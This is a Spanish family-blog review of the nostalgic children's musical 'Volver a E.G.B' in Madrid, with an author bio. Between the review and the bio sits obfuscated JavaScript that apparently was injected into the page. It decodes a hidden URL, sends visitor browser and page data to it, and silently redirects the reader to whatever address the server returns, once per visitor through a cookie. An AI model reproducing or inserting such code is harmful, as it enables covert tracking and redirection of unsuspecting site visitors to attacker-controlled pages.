Volver a E.G.B, un show para niños que bailarán y cantarán mayores

Ya lo avisan en su dossier de prensa, “Un musical infantil para niños de 1 a 80 años”. Y nunca fue tan cierto, porque Volver a E.G. B es un espectáculo para hijos, padres y abuelos. Tres generaciones juntas en un teatro para pasar algo más de hora y media entre bailes, risas, recuerdos y  muy buena música.

El 13 de noviembre Volver a E.G.B estará en el Palacio de la Prensa de Madrid y, de verdad, os recomiendo que os paséis porque haréis un agradable viaje al pasado. Veréis al mismísimo Espinete, podréis saludar a Naranjito y también bailar con Pumuky; cantaréis todo el repetorio de Los Payasos de la tele, bailaréis Chas y aparezco a tu lado, volveréis a escuchar eso de “Si te encuentras en peligro, tú…”, de nuestro querido amigo Willy Fog, y jugaréis de nuevo a La Yenca, pero esta vez con la compañía de vuestros hijos. En esta aventura musical tampoco faltan los libros de Santillana, las capas de Comand G o los vinilos. ¡Ays, cuántos recuerdos guardados a fuego en nuestra memoria y puestos ahora en formato de teatro musical!

retira catalogo okLo mejor de todo es que, como imaginaréis, los mayores no los pasamos pipa, pero es que además pudimos contarles un montón de cosas de nuestra infancia a los más peques. “¿Qué día echaban Candy, Candy?”, me dijo Elena cuando le comenté que era mi serie de dibujos animados favorita, mientras Ana, de año y medio, no paraba de dar palmas y de intentar imitar las coreografías. Y aunque pueda parecer que es un espectáculo más para disfrute de mayores que de pequeños, los creadores han sabido, a través de los tres personajes protagonistas del show, Ely, Goby y Bum, meterse en el bosillo desde un principio a los reyes de la casa. “¡¿Quién quiere venir aquí con nosotros a bailar?!”, gritaban desde lo más alto del escenario estos tres amigos, que con la excusa de hacer un trabajo para el cole, se reúnen en el garaje de casa de los padres de Goby y ahí es donde comienzan a descubrir lo que escuchaban, veían y cantaban sus padres cuando eran como ellos. También averiguarán algún que otro secreto que esconde uno de ellos, pero no haré spoiler.

Salimos con muy buen sabor de boca y cantando en familia de camino a casa los temas que forman parte de la banda sonora de mi niñez y de este espectáculo. ¡Gracias Volver a E.G.B por mantener vivos tantos recuerdos!
var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *